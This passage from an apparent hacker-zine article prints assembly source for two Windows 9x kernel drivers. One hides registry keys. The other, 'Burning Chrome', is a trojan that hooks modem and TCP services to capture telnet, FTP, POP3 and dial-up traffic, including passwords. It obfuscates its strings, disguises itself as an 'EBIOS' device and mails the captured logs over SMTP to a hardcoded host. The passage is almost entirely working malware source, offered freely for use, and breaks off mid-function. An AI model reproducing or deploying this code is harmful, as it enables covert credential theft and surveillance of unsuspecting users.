  782.  
  783. Here is some simple code for doing this:
  784.  
  785. <++> hidereg.asm
  786.  
  787. .386p
  788.  
  789. INCLUDE VMM.INC
  790. INCLUDE VMMREG.INC
  791.  
  792. Declare_Virtual_Device HIDEREG, 1, 0, Control_Proc, Undefined_Device_ID, \
  793. Undefined_Init_Order, , ,
  794.  
  795. VxD_LOCKED_DATA_SEG
  796.  
  797. pRegEnumKey_PrevHook           dd 0
  798.  
  799. VxD_LOCKED_DATA_ENDS
  800.  
  801. VxD_LOCKED_CODE_SEG
  802.  
  803. BeginProc RegEnumKey_Hook, HOOK_PROC, pRegEnumKey_PrevHook, LOCKED
  804.  
  805.         push ebp                        ; C rulez!
  806.         mov ebp, esp
  807.  
  808. ; ebp+00h -> saved ebp
  809. ; ebp+04h -> return address
  810. ; ebp+08h -> hKey
  811. ; ebp+0Ch -> iSubKey
  812. ; ebp+10h -> lpszName
  813. ; ebp+14h -> cchName
  814.  
  815.         pushad
  816.         pushfd
  817.  
  818.         int 3
  819.  
  820.         push [ebp+14h]                  ; Push cchName
  821.         push [ebp+10h]                  ; Push lpszName
  822.         push [ebp+0Ch]                  ; Push iSubKey
  823.         push [ebp+08h]                  ; Push hKey
  824.         call [pRegEnumKey_PrevHook]     ; Call the old handler
  825.  
  826.         add esp, 10h                    ; C really rulez!
  827.  
  828.         mov [ebp-04h], eax              ; blah...
  829.  
  830.         mov edi, [ebp+10h]
  831.  
  832.         cmp dword ptr [edi], 'xzzy'     ; Is this "hidden" key ?
  833.         jne RegEnumKey_Hook_End
  834.  
  835.         mov dword ptr [ebp-04h], ERROR_NO_MORE_ITEMS ; Dirty, but works
  836.  
  837.         mov byte ptr [edi], 0
  838.  
  839. RegEnumKey_Hook_End:
  840.         popfd
  841.         popad
  842.  
  843.         pop ebp
  844.  
  845.         ret
  846.  
  847. EndProc RegEnumKey_Hook
  848.  
  849.  
  850. BeginProc       Control_Proc
  851.         Control_Dispatch Device_Init, Do_Device_Init
  852.         clc
  853.         ret
  854. EndProc         Control_Proc
  855.  
  856. VxD_LOCKED_CODE_ENDS
  857.  
  858. VxD_ICODE_SEG
  859.  
  860. BeginProc       Do_Device_Init
  861.  
  862.         GetVxDServiceOrdinal eax, _RegEnumKey
  863.         mov esi, offset32 RegEnumKey_Hook
  864.         VMMcall Hook_Device_Service
  865.  
  866.         ret
  867. EndProc         Do_Device_Init
  868.  
  869. VxD_ICODE_ENDS
  870.  
  871. ; End of HIDEREG.ASM
  872.  
  873.         END
  874. <-->
  875.  
  876. ----[  Functions List
  877.  
  878. This is a list of all the functions in CHROME.ASM and what they do. I hope it
  879. helps.
  880.  
  881.   VCOMM Hooking
  882.  
  883. OpenComm_Hook           Start modem log
  884. WriteComm_Hook          Log modem data
  885. CloseComm_Hook          End modem log
  886.  
  887.   TDI Hooking
  888.  
  889. TdiConnect_Hook         Start TCP log
  890. TdiConnect_Callback     Helper for TdiConnect_Hook
  891. TdiSend_Hook            Log TCP data
  892. TdiDisconnect_Hook      End TCP log
  893. TdiCloseConnection_Hook End TCP log
  894.  
  895.   General logging
  896.  
  897. Send_Common             Common code for logs
  898. ModemLog                Processes modem logs
  899. TelnetLog               Processes telnet logs
  900. FtpLog                  Processes ftp logs
  901. Pop3Log                 Processes pop3 logs
  902. DWordToStr              aka IP2HexStr
  903.  
  904.   Mailing
  905.  
  906. Sendmail                Sendmail
  907. TdiMail_Callback        Helper for Sendmail
  908. QueryRegValue           Gets registry data
  909.  
  910. ----[  The Source
  911.  
  912. <++> chrome.asm
  913.  
  914. ;---------------------------------------------------------------------------;
  915. ; Burning Chrome version 0.9 by Solar Eclipse <solareclipse@phreedom.org>   ;
  916. ;                                                                           ;
  917. ; This program is free. Feel free to use it any way you want. If you break  ;
  918. ; the law and get caught, don't come whining to me. If you modify the code, ;
  919. ; please be a nice guy and send me a copy.                                  ;
  920. ; And don't forget to visit the cool guys at http://www.phreedom.org/       ;
  921. ;---------------------------------------------------------------------------;
  922.  
  923. .386p
  924.  
  925. ;---------------------------------------------------------------------------;
  926. ; Includes                                                                  ;
  927. ;---------------------------------------------------------------------------;
  928.  
  929. INCLUDE VMM.INC
  930. INCLUDE VCOMM.INC
  931. INCLUDE VMMREG.INC
  932.  
  933. ;INCLUDE DEBUG.INC               ; Temporary
  934.  
  935. VTDI_Device_ID    equ 0488h
  936.  
  937. INCLUDE VTDI.INC
  938.  
  939. ;---------------------------------------------------------------------------;
  940. ; Some constants                                                            ;
  941. ;---------------------------------------------------------------------------;
  942.  
  943. MAX_BUFFER_LENGTH   equ 1500
  944. MAIL_BUFFER_LENGTH equ 10000
  945.  
  946. IP_1            equ 192         ; 192.168.0.3:25
  947. IP_2            equ 168
  948. IP_3            equ 0
  949. IP_4            equ 3
  950. PORT            equ 25
  951.  
  952. CHROME_Init_Order equ 0C000h + VNETBIOS_Init_Order
  953.  
  954. ;---------------------------------------------------------------------------;
  955. ; EBIOS_DDB                                                                 ;
  956. ;---------------------------------------------------------------------------;
  957.  
  958. Declare_Virtual_Device EBIOS, 1, 0, Control_Proc, EBIOS_Device_ID, CHROME_Init_Order, , ,
  959.  
  960. ;---------------------------------------------------------------------------;
  961. ; Locked Data Segment                                                       ;
  962. ;---------------------------------------------------------------------------;
  963.  
  964. VxD_LOCKED_DATA_SEG
  965.  
  966. ; ASCII data (xored)
  967.  
  968. ASCIIStart              equ $
  969.  
  970. OurKey                  db 98,75,88,78,93,75,88,79,118,110,79,89,73,88,67,90,94,67,69,68,118
  971.                         db 121,83,89,94,79,71,118,122,79,88,67,90,66,79,88,75,70,105,69,71,90
  972.                         db 69,68,79,68,94,99,68,94,79,88,73,69,68,68,79,73,94,42
  973. ;                          'Hardware\Description\System\PeripheralComponentInterconnect', 0
  974. CurrentVersionSubKey    db 121,69,76,94,93,75,88,79,118,103,67,73,88,69,89,69,76,94,118,125,67
  975.                         db 68,78,69,93,89,118,105,95,88,88,79,68,94,124,79,88,89,67,69,68,42
  976. ;                          'Software\Microsoft\Windows\CurrentVersion', 0
  977. sRegisteredOwner        db 120,79,77,67,89,94,79,88,79,78,101,93,68,79,88,42
  978. ;                          'RegisteredOwner', 0
  979. sRegisteredOrganization db 120,79,77,67,89,94,79,88,79,78,101,88,77,75,68,67,80,75,94,67,69,68,42
  980. ;                          'RegisteredOrganization', 0
  981. sVersionNumber          db 124,79,88,89,67,69,68,100,95,71,72,79,88,42
  982. ;                          'VersionNumber', 0
  983. sSystemRoot             db 121,83,89,94,79,71,120,69,69,94,42
  984. ;                          'SystemRoot', 0
  985. TCPName                 db 103,121,126,105
  986. Letter_P                db 122
  987. Zero                    db 42
  988. ;                          'MSTCP', 0
  989. MailData_1              db 98,111,102,101,10,70,69,73,75,70,66,69,89,94,39,32
  990. ;                          'HELO localhost', 13, 10
  991.                         db 103,107,99,102,10,108,120,101,103,16,22,82,82,82,106,82,82,82,4,73,69,71,20,39,32
  992. ;                          'MAIL FROM:<xxx@xxx.com>', 13, 10
  993.                         db 120,105,122,126,10,126,101,16,22,82,82,82,106,82,82,82,4,73,69,71,20,39,32
  994. ;                          'RCPT TO:<xxx@xxx.com>', 13, 10
  995.                         db 110,107,126,107,39,32
  996. ;                          'DATA', 13, 10
  997.                         db 121,95,72,64,79,73,94,16,10
  998. ;                          'Subject: '
  999.  
  1000. cbMailData_1            equ $-MailData_1
  1001.  
  1002. MailData_2              db 39,32
  1003. ;                          13, 10
  1004.                         db 4,39,32
  1005. ;                          '.', 13, 10
  1006.                         db 123,127,99,126,39,32,42
  1007. ;                          'QUIT', 13, 10, 0
  1008.  
  1009. cbMailData_2            equ $-MailData_2
  1010.  
  1011. ASCIILength             equ $-ASCIIStart
  1012.  
  1013. ; This is for the hooks
  1014.  
  1015. pOpenComm_PrevHook      dd 0    ; Addresses of previous service handlers
  1016. pWriteComm_PrevHook     dd 0
  1017. pCloseComm_PrevHook     dd 0
  1018.  
  1019. TdiConnect_PrevAddr     dd 0
  1020. TdiSend_PrevAddr        dd 0
  1021. TdiDisconnect_PrevAddr  dd 0
  1022. TdiCloseConnection_PrevAddr dd 0
  1023.  
  1024. ; Flags
  1025.  
  1026. Disable                 db 0
  1027.  
  1028. TraceType               db 0 ; 0 - nothing, 1 - modem, 2 - telnet, 3 - ftp,
  1029.                              ; 4 - pop3
  1030. TracedHandle            dd 0
  1031. LogProc                 dd 0 ; Address of log processing proc
  1032.  
  1033. TraceLetters            equ $  ; Table with letters for each different
  1034. NOTHING                 db 'N' ; type of trace. Indexed with TraceType
  1035. MODEM                   db 'M'
  1036. TELNET                  db 'T'
  1037. FTP                     db 'F'
  1038. POP3                    db 'P'
  1039.  
  1040. IP                      dd 0
  1041. ValueName               dd 0
  1042.  
  1043. pBuffer                 dd 0
  1044. BufferSize              dd 0
  1045. Index                   dd 0
  1046.  
  1047. MailPointer             dd 0
  1048.  
  1049. hOurKey                 dd 0
  1050. OurSubKey               db "0", 0
  1051. hOurSubKey              dd 0
  1052.  
  1053. OldCallback             dd 0
  1054.  
  1055. dwTemp_1                dd 0
  1056. dwTemp_2                dd 0
  1057.  
  1058. TdiDispatchTable        dd 0
  1059.  
  1060. AddressHandle           dd 0
  1061. ConnectionContext       dd 0
  1062.  
  1063. Request                 dd 0            ; TDI_REQUEST structure
  1064. RequestNotifyObject     dd offset32 TdiMail_Callback
  1065. RequestContext          dd 0
  1066. TdiStatus               dd 0
  1067.  
  1068. TdiAddressOption        db 1            ; TDI_ADDRESS_OPTION_REUSE
  1069.                         db 0            ; TDI_OPTION_EOL
  1070.  
  1071. TransportAddress        dd 1            ; TAAddressCount
  1072.  
  1073.                         dw 14           ; Address length
  1074.                         dw 2            ; Address type - TDI_ADDRESS_IP
  1075.  
  1076.                         dw 0            ; sinport
  1077.                         dd 0            ; sin_addr (0.0.0.0)
  1078.                         dd 0            ; sin_zero
  1079.                         dd 0
  1080.  
  1081. Context                 dd 0            ; Context for TdiOpenConnection
  1082.  
  1083. RequestAddr             dd 0            ; UserDataLength
  1084.                         dd 0            ; UserData
  1085.                         dd 0            ; OptionsLength
  1086.                         dd 0            ; Options
  1087.                         dd 22           ; RemoteAddressLength
  1088.                         dd offset32 RemoteAddress ; *RemoteAddress
  1089.  
  1090. RemoteAddress           dd 1            ; TAddressCount
  1091.  
  1092.                         dw 14           ; Address length
  1093.                         dw 2            ; Address type - TDI_ADDRESS_IP
  1094.  
  1095.                         db 0            ; sinport (fuckin net order!!!)
  1096.                         db PORT
  1097.                         db IP_1         ; sin_addr (192.168.0.1)
  1098.                         db IP_2
  1099.                         db IP_3
  1100.                         db IP_4
  1101.                         dd 0            ; sin_zero
  1102.                         dd 0
  1103.  
  1104. NDISBuffer              dd 0            ; Next
  1105. pMailBuffer             dd 0            ; Data address
  1106.                         dd 0            ; Pool
  1107. SendDataLength          dd 0            ; Length
  1108.                         dd 'FUBN'       ; Signature "NBUF"
  1109.  
  1110. VxD_LOCKED_DATA_ENDS
  1111.  
  1112. ;---------------------------------------------------------------------------;
  1113. ; Locked Code Segment                                                       ;
  1114. ;---------------------------------------------------------------------------;
  1115.  
  1116. VxD_LOCKED_CODE_SEG
  1117.  
  1118. ;---------------------------------------------------------------------------;
  1119. ; _VCOMM_OpenComm hook procedure                                            ;
  1120. ;---------------------------------------------------------------------------;
  1121. ;                                                                           ;
  1122. ; Used variables         Read    Write                                      ;
  1123. ;                                                                           ;
  1124. ; Disable                  x                                                ;
  1125. ; TraceType                x       x                                        ;
  1126. ; TracedHandle             x       x                                        ;
  1127. ; Index                            x                                        ;
  1128. ; pOpenComm_PrevHook       x                                                ;
  1129. ;                                                                           ;
  1130. ;---------------------------------------------------------------------------;
  1131.  
  1132. BeginProc OpenComm_Hook, HOOK_PROC, pOpenComm_PrevHook, LOCKED
  1133.  
  1134.         push ebp
  1135.         mov ebp, esp
  1136.  
  1137. ; ebp-04h -> saved eax (from pushad)
  1138. ; ebp+00h -> saved ebp
  1139. ; ebp+04h -> return address
  1140. ; ebp+08h -> pPortName
  1141. ; ebp+0Ch -> VMId
  1142.  
  1143.         pushad
  1144.         pushfd
  1145.  
  1146.         cmp Disable, 1                  ; Is hook operation disabled?
  1147.         jz OpenComm_Hook_End
  1148.  
  1149.         cmp TraceType, 0                ; Is any tracing in progress?
  1150.         jne OpenComm_Hook_End           ; if yes - abort
  1151.  
  1152.         mov esi, dword ptr [ebp+08h]    ; ds:[esi] = pPortName
  1153.         cmp word ptr [esi], "OC"        ; Continue only if port name is "COM"
  1154.         jne OpenComm_Hook_End
  1155.  
  1156.         push [ebp+0Ch]                  ; Push VMId
  1157.         push [ebp+08h]                  ; Push pPortName
  1158.         call [pOpenComm_PrevHook]       ; Call the old handler
  1159.  
  1160.         add esp, 8h
  1161.  
  1162.         mov [ebp-04h], eax              ; blah...
  1163.  
  1164.         cmp eax, -31                    ; If there is error opening the port
  1165.         jae Dont_Trace_Comm
  1166.  
  1167.         mov TracedHandle, eax           ; Save the comm handle we are tracing
  1168.  
  1169.         xor eax, eax                    ; Reset the buffer
  1170.         mov Index, eax
  1171.  
  1172.         inc al                          ; TraceType = 1 (modem trace)
  1173.         mov TraceType, al
  1174.  
  1175.         mov BufferSize, 1024
  1176.  
  1177.         mov LogProc, offset32 ModemLog
  1178.  
  1179. Dont_Trace_Comm:
  1180.         popfd
  1181.         popad
  1182.  
  1183.         pop ebp
  1184.         ret                             ; Return to caller
  1185.  
  1186. OpenComm_Hook_End:
  1187.         popfd
  1188.         popad
  1189.  
  1190.         pop ebp
  1191.  
  1192.         jmp [pOpenComm_PrevHook]       ; Chain to previous hook
  1193.  
  1194. EndProc OpenComm_Hook
  1195.  
  1196. ;---------------------------------------------------------------------------;
  1197. ; _VCOMM_WriteComm hook procedure                                           ;
  1198. ;---------------------------------------------------------------------------;
  1199. ;                                                                           ;
  1200. ; Used variables         Read    Write                                      ;
  1201. ;                                                                           ;
  1202. ; Disable                  x                                                ;
  1203. ; TraceType                x                                                ;
  1204. ;                                                                           ;
  1205. ; Calls: Send_Common                                                        ;
  1206. ;---------------------------------------------------------------------------;
  1207.  
  1208. BeginProc WriteComm_Hook, HOOK_PROC, pWriteComm_PrevHook, LOCKED
  1209.  
  1210.  
  1211.         push ebp
  1212.         mov ebp, esp
  1213.  
  1214. ; ebp+00h -> saved ebp
  1215. ; ebp+04h -> return address
  1216. ; ebp+08h -> hPort
  1217. ; ebp+0Ch -> achBuffer
  1218. ; ebp+10h -> cchRequested
  1219. ; ebp+14h -> cchWritten
  1220.  
  1221.         pushfd                          ; save flags on stack
  1222.         pushad                          ; save registers on stack
  1223.  
  1224.         xor eax, eax
  1225.  
  1226.         cmp Disable, al                 ; Is hook operation disabled?
  1227.         jnz WriteComm_Hook_End
  1228.  
  1229.         cmp TraceType, 1                ; Is this a modem trace?
  1230.         jnz WriteComm_Hook_End
  1231.  
  1232. ;---------------------------------------------------------------------------;
  1233. ; The following code is disabled due to the strange behavior of Windows.    ;
  1234. ; It opens COMx and sends AT commands using this connection. But when the   ;
  1235. ; modem connects, it opens another connection, which name varies and uses   ;
  1236. ; it to send PPP traffic. That's why after opening the COMx connection, we  ;
  1237. ; will log EVERY byte sent through EVERY connection, until the COMx is      ;
  1238. ; closed or the log limit is exceeded.                                      ;
  1239. ;                                                                           ;
  1240. ;        mov eax, TracedHandle           ; Are we tracing our connection?   ;
  1241. ;        cmp eax, [ebp+08h]                                                 ;
  1242. ;        jne WriteComm_Hook_End                                             ;
  1243. ;---------------------------------------------------------------------------;
  1244.  
  1245.         mov esi, dword ptr [ebp+0Ch]    ; esi = achBuffer (source)
  1246.  
  1247.         mov eax, [ebp+10h]              ; eax = cchRequested
  1248.  
  1249.         call Send_Common
  1250.  
  1251. WriteComm_Hook_End:
  1252.         popad
  1253.         popfd
  1254.  
  1255.         pop ebp
  1256.  
  1257.         jmp [pWriteComm_PrevHook]       ; Chain to previous hook
  1258.  
  1259. EndProc WriteComm_Hook
  1260.  
  1261. ;---------------------------------------------------------------------------;
  1262. ; _VCOMM_CloseComm hook procedure                                           ;
  1263. ;---------------------------------------------------------------------------;
  1264. ;                                                                           ;
  1265. ; Used variables         Read    Write                                      ;
  1266. ;                                                                           ;
  1267. ; Disable                  x                                                ;
  1268. ; TraceType                x       x                                        ;
  1269. ; TracedHandle             x                                                ;
  1270. ;                                                                           ;
  1271. ;---------------------------------------------------------------------------;
  1272.  
  1273. BeginProc CloseComm_Hook, HOOK_PROC, pCloseComm_PrevHook, LOCKED
  1274.  
  1275.         push ebp
  1276.         mov ebp, esp
  1277.  
  1278. ; ebp+00h -> saved ebp
  1279. ; ebp+04h -> return address
  1280. ; ebp+08h -> hPort
  1281.  
  1282.         pushfd                          ; save flags on stack
  1283.         pushad                          ; save registers on stack
  1284.  
  1285.         cmp Disable, 1                  ; Is hook operation disabled?
  1286.         jz CloseComm_Hook_End
  1287.  
  1288.         cmp TraceType, 1                ; Is this a modem trace?
  1289.         jnz CloseComm_Hook_End
  1290.  
  1291.         mov eax, TracedHandle           ; If hPort = TracedHandle stop tracing
  1292.         cmp eax, [ebp+08h]
  1293.         jne CloseComm_Hook_End
  1294.  
  1295.         mov TraceType, 0                ; Stop tracing
  1296.  
  1297. CloseComm_Hook_End:
  1298.         popad
  1299.         popfd
  1300.         pop ebp
  1301.  
  1302.         jmp [pCloseComm_PrevHook]       ; Chain to previous hook
  1303.  
  1304. EndProc CloseComm_Hook
  1305.  
  1306. ;---------------------------------------------------------------------------;
  1307. ; TdiConnect hook procedure                                                 ;
  1308. ;---------------------------------------------------------------------------;
  1309. ;                                                                           ;
  1310. ; Used variables         Read    Write                                      ;
  1311. ;                                                                           ;
  1312. ; Disable                  x                                                ;
  1313. ; TraceType                x       x                                        ;
  1314. ; TracedHandle                     x                                        ;
  1315. ; Index                            x                                        ;
  1316. ; BufferSize                       x                                        ;
  1317. ; IP                               x                                        ;
  1318. ; OldCallback                      x                                        ;
  1319. ;                                                                           ;
  1320. ; Calls: Sendmail, TdiConnect_Callback                                      ;
  1321. ;---------------------------------------------------------------------------;
  1322.  
  1323. BeginProc TdiConnect_Hook
  1324.  
  1325.         push ebp
  1326.         mov ebp, esp
  1327.  
  1328. ; ebp-04h -> saved eax (from pushad)
  1329. ; ebp+00h -> saved ebp
  1330. ; ebp+04h -> return address
  1331. ; ebp+08h -> *Request
  1332. ; ebp+0Ch -> *TO
  1333. ; ebp+10h -> *RequestAddr
  1334. ; ebp+14h -> *ReturnAddr
  1335.  
  1336.         pushad
  1337.         pushfd
  1338.  
  1339.         cmp Disable, 1                  ; Is hook operation disabled?
  1340.         jz TdiConnect_Hook_Jmp
  1341.  
  1342.         cmp TraceType, 0                ; Is any tracing in progress?
  1343.         jne TdiConnect_Hook_Jmp         ; if yes - abort
  1344.  
  1345.         mov edi, [ebp+10h]              ; edi = *RequestAddr
  1346.         mov edi, [edi+14h]              ; edi = *RemoteAddr
  1347.         cmp word ptr [edi+06h], 2       ; TDI_ADDRESS_TYPE_IP
  1348.         jne TdiConnect_Hook_Jmp
  1349.  
  1350.         xor eax, eax                    ; Reset the index
  1351.         mov Index, eax
  1352.  
  1353.         mov ax, [edi+08h]               ; ax = sin_port
  1354.         cmp ax, 1500h                   ; ftp?
  1355.         je Start_Ftp_log
  1356.         cmp ax, 1700h                   ; telnet?
  1357.         je Start_Telnet_log
  1358.         cmp ax, 6E00h                   ; pop3?
  1359.         je Start_Pop3_log
  1360.  
  1361.         cmp ax, 5000h                   ; http?
  1362.         jne TdiConnect_Hook_Jmp
  1363.  
  1364.         call Sendmail
  1365.         jmp TdiConnect_Hook_Jmp
  1366.  
  1367.  
  1368. Start_Telnet_log:
  1369.         mov TraceType, 2
  1370.         mov LogProc, offset32 TelnetLog
  1371.         mov BufferSize, 500
  1372.         jmp Start_Log
  1373.  
  1374. Start_Ftp_log:
  1375.         mov TraceType, 3
  1376.         mov LogProc, offset32 FtpLog
  1377.         mov BufferSize, 100
  1378.         jmp Start_Log
  1379.  
  1380. Start_Pop3_log:
  1381.         mov TraceType, 4
  1382.         mov LogProc, offset32 Pop3Log
  1383.         mov BufferSize, 100
  1384.  
  1385. Start_Log:
  1386.         mov ebx, [edi+0Ah]              ; ebx = in_addr
  1387.         mov IP, ebx                     ; Save the IP
  1388.  
  1389.         mov edi, [ebp+08h]              ; edi = *Request
  1390.         mov eax, [edi]                  ; Request.ConnectionContext
  1391.         mov TracedHandle, eax
  1392.  
  1393.         mov eax, [edi+04h]              ; Save old callback
  1394.         mov OldCallback, eax
  1395.         mov [edi+04h], offset32 TdiConnect_Callback ; Hook it
  1396.  
  1397.         push edi
  1398.  
  1399.         push [ebp+14h]
  1400.         push [ebp+10h]
  1401.         push [ebp+0Ch]
  1402.         push [ebp+08h]
  1403.         call [TdiConnect_PrevAddr]      ; Chain to previous hook
  1404.         add esp, 10h
  1405.  
  1406.         mov [ebp-04h], eax              ; Save the return value
  1407.  
  1408.         pop edi                         ; edi = *Request
  1409.         mov ebx, OldCallback
  1410.         mov [edi+04h], ebx              ; Restore old callback
  1411.  
  1412.         cmp eax, 0FFh
  1413.         je TdiConnect_Hook_End
  1414.  
  1415.         or eax, eax
  1416.         je TdiConnect_Hook_End
  1417.  
  1418.         ; There is some error, don't trace
  1419.  
  1420.         mov TraceType, 0
  1421.  
  1422. TdiConnect_Hook_End:
  1423.         popfd
  1424.         popad
  1425.  
  1426.         pop ebp
  1427.  
  1428.         ret
  1429.  
  1430. TdiConnect_Hook_Jmp:
  1431.         popfd
  1432.         popad
  1433.  
  1434.         pop ebp
  1435.  
  1436.         jmp [TdiConnect_PrevAddr]       ; Chain to previous hook
  1437.  
  1438. EndProc TdiConnect_Hook
  1439.  
  1440.  
  1441. ;---------------------------------------------------------------------------;
  1442. ; TdiConnect_Callback hook procedure                                        ;
  1443. ;---------------------------------------------------------------------------;
  1444. ;                                                                           ;
  1445. ; Used variables         Read    Write                                      ;
  1446. ;                                                                           ;
  1447. ; TraceType                x       x                                        ;
  1448. ; OldCallback              x                                                ;
  1449. ;                                                                           ;
  1450. ;---------------------------------------------------------------------------;
  1451.  
  1452. BeginProc TdiConnect_Callback
  1453.  
  1454.         push ebp
  1455.         mov ebp, esp
  1456.  
  1457. ; ebp+00h -> saved ebp
  1458. ; ebp+04h -> return address
  1459. ; ebp+08h -> *Context
  1460. ; ebp+0Ch -> FinalStatus
  1461. ; ebp+10h -> ByteCount
  1462.  
  1463.         pushad
  1464.         pushfd
  1465.  
  1466.         mov eax, [ebp+0Ch]
  1467.         or eax, eax
  1468.         je TdiConnect_Callback_End
  1469.  
  1470.         mov TraceType, 0
  1471.  
  1472. TdiConnect_Callback_End:
  1473.         popfd
  1474.         popad
  1475.  
  1476.         pop ebp
  1477.         jmp [OldCallback]
  1478.  
  1479. EndProc TdiConnect_Callback
  1480.  
  1481. ;---------------------------------------------------------------------------;
  1482. ; TdiSend hook procedure                                                    ;
  1483. ;---------------------------------------------------------------------------;
  1484. ;                                                                           ;
  1485. ; Used variables         Read    Write                                      ;
  1486. ;                                                                           ;
  1487. ; Disable                  x                                                ;
  1488. ; TraceType                x                                                ;
  1489. ; TracedHandle             x                                                ;
  1490. ;                                                                           ;
  1491. ; Calls: Send_Common                                                        ;
  1492. ;---------------------------------------------------------------------------;
  1493.  
  1494. BeginProc TdiSend_Hook
  1495.  
  1496.         push ebp
  1497.         mov ebp, esp
  1498.  
  1499. ; ebp+00h -> saved ebp
  1500. ; ebp+04h -> return address
  1501. ; ebp+08h -> *Request
  1502. ; ebp+0Ch -> Flags
  1503. ; ebp+10h -> SendLength
  1504. ; ebp+14h -> *SendBuffer
  1505.  
  1506.         pushfd
  1507.         pushad
  1508.  
  1509.         cmp Disable, 1                  ; Is hook operation disabled?
  1510.         je TdiSend_Hook_End
  1511.  
  1512.         cmp TraceType, 1                ; Is this a TCP trace?
  1513.         jbe TdiSend_Hook_End
  1514.  
  1515.         mov edi, [ebp+08h]              ; edi = *Request
  1516.         mov eax, TracedHandle
  1517.         cmp eax, [edi]                  ; Are we tracing THIS ConnectionContext?
  1518.         jne TdiSend_Hook_End
  1519.  
  1520.         mov edi, [ebp+14h]              ; edi = *SendBuffer
  1521.         mov esi, [edi+04h]              ; esi = source buffer
  1522.  
  1523.         mov eax, [edi+0Ch]              ; eax = Length
  1524.  
  1525.         call Send_Common
  1526.  
  1527. TdiSend_Hook_End:
  1528.         popad
  1529.         popfd
  1530.  
  1531.         pop ebp
  1532.  
  1533.         jmp [TdiSend_PrevAddr]          ; Chain to previous hook
  1534.  
  1535. EndProc TdiSend_Hook
  1536.  
  1537. ;---------------------------------------------------------------------------;
  1538. ; TdiDisconnect hook procedure                                              ;
  1539. ;---------------------------------------------------------------------------;
  1540. ;                                                                           ;
  1541. ; Used variables         Read    Write                                      ;
  1542. ;                                                                           ;
  1543. ; Disable                  x                                                ;
  1544. ; TraceType                x       x                                        ;
  1545. ; TracedHandle             x                                                ;
  1546. ;                                                                           ;
  1547. ;---------------------------------------------------------------------------;
  1548.  
  1549. BeginProc TdiDisconnect_Hook
  1550.  
  1551.         push ebp
  1552.         mov ebp, esp
  1553.  
  1554. ; ebp+00h -> saved ebp
  1555. ; ebp+04h -> return address
  1556. ; ebp+08h -> *Request
  1557. ; ebp+0Ch -> *TO
  1558. ; ebp+10h -> Flags
  1559. ; ebp+14h -> *DisConnInfo
  1560. ; ebp+18h -> *ReturnInfo
  1561.  
  1562.         pushfd                          ; save flags on stack
  1563.         pushad                          ; save registers on stack
  1564.  
  1565.         cmp Disable, 1                  ; Is hook operation disabled?
  1566.         jz TdiDisconnect_Hook_End
  1567.  
  1568.         cmp TraceType, 1                ; Is this a TCP trace?
  1569.         jbe TdiDisconnect_Hook_End
  1570.  
  1571.         mov eax, TracedHandle           ; If the traced handle is being closed
  1572.         mov edi, [ebp+08h]              ; edi = *Request
  1573.         cmp eax, [edi]                  ; [edi] = ConnectionContext
  1574.         jne TdiDisconnect_Hook_End
  1575.  
  1576. ; We are disconnected before the buffer is full. We will reset the BufferSize
  1577. ; to the current and process the buffer anyway.
  1578.  
  1579.         mov eax, Index
  1580.         mov BufferSize, eax
  1581.         xor eax, eax
  1582.         call Send_Common
  1583.  
  1584. ; Don't need to stop tracing, because Send_Common should do this.
  1585.  
  1586. TdiDisconnect_Hook_End:
  1587.         popad
  1588.         popfd
  1589.         pop ebp
  1590.  
  1591.         jmp [TdiDisconnect_PrevAddr]    ; Chain to previous hook
  1592.  
  1593. EndProc TdiDisconnect_Hook
  1594.  
  1595. ;---------------------------------------------------------------------------;
  1596. ; TdiCloseConnection hook procedure                                         ;
  1597. ;---------------------------------------------------------------------------;
  1598. ;                                                                           ;
  1599. ; Used variables         Read    Write                                      ;
  1600. ;                                                                           ;
  1601. ; Disable                  x                                                ;
  1602. ; TraceType                x       x                                        ;
  1603. ; TracedHandle             x                                                ;
  1604. ;                                                                           ;
  1605. ;---------------------------------------------------------------------------;
  1606.  
  1607. BeginProc TdiCloseConnection_Hook
  1608.  
  1609.         push ebp
  1610.         mov ebp, esp
  1611.  
  1612. ; ebp+00h -> saved ebp
  1613. ; ebp+04h -> return address
  1614. ; ebp+08h -> *Request
  1615.  
  1616.         pushfd                          ; save flags on stack
  1617.         pushad                          ; save registers on stack
  1618.  
  1619.         cmp Disable, 1                  ; Is hook operation disabled?
  1620.         jz TdiCloseConnection_Hook_End
  1621.  
  1622.         cmp TraceType, 1                ; Is this an IP trace?
  1623.         jbe TdiCloseConnection_Hook_End
  1624.  
  1625.         mov eax, TracedHandle           ; If the traced handle is being closed
  1626.         mov edi, [ebp+08h]              ; edi = *Request
  1627.         cmp eax, [edi]                  ; [edi] = ConnectionContext
  1628.         jne TdiCloseConnection_Hook_End
  1629.  
  1630. ; We are disconnected before the buffer is full. We will reset the BufferSize
  1631. ; to the current and process the buffer anyway.
  1632.  
  1633.         mov eax, Index
  1634.         mov BufferSize, eax
  1635.         xor eax, eax
  1636.         call Send_Common
  1637.  
  1638. ; Don't need to stop tracing, because Send_Common should do this.
  1639.  
  1640. TdiCloseConnection_Hook_End:
  1641.         popad
  1642.         popfd
  1643.         pop ebp
  1644.  
  1645.         jmp [TdiCloseConnection_PrevAddr]    ; Chain to previous hook
  1646.  
  1647. EndProc TdiCloseConnection_Hook
  1648.  
  1649.  
  1650. ;---------------------------------------------------------------------------;
  1651. ; Send_Common procedure                                                     ;
  1652. ;---------------------------------------------------------------------------;
  1653. ; Input:                                                                    ;
  1654. ;                                                                           ;
  1655. ; eax - length of data                                                      ;
  1656. ; esi - data source                                                         ;
  1657. ;---------------------------------------------------------------------------;
  1658. ;                                                                           ;
  1659. ; Used variables         Read    Write                                      ;
  1660. ;                                                                           ;
  1661. ; BufferSize               x                                                ;
  1662. ; Index                    x        x                                       ;
  1663. ; pBuffer                  x                                                ;
  1664. ; ValueName                         x                                       ;
  1665. ; dwTemp_1                          x                                       ;
  1666. ; hOurKey                  x                                                ;
  1667. ; TraceType                         x                                       ;
  1668. ;                                                                           ;
  1669. ; Calls: ModemLog, TelnetLog, FtpLog, Pop3Log                               ;
  1670. ;---------------------------------------------------------------------------;
  1671.  
  1672. BeginProc Send_Common
  1673.  
  1674.         mov ecx, BufferSize
  1675.         mov ebx, Index                  ; ebx = Index
  1676.         sub ecx, ebx                    ; ecx = free space in buffer
  1677.  
  1678.         mov edi, pBuffer                ; edi = pBuffer+Index (destination)
  1679.         add edi, Index
  1680.  
  1681.         cmp ecx, eax
  1682.         jbe Do_Copy_Buffer              ; If the space in the buffer is not
  1683.                                         ; enough, don't overrun it
  1684.  
  1685.         mov ecx, eax                    ; Else, copy cchRequested bytes
  1686.  
  1687. Do_Copy_Buffer:
  1688.         add ebx, ecx                    ; Increment the Index
  1689.         mov Index, ebx
  1690.  
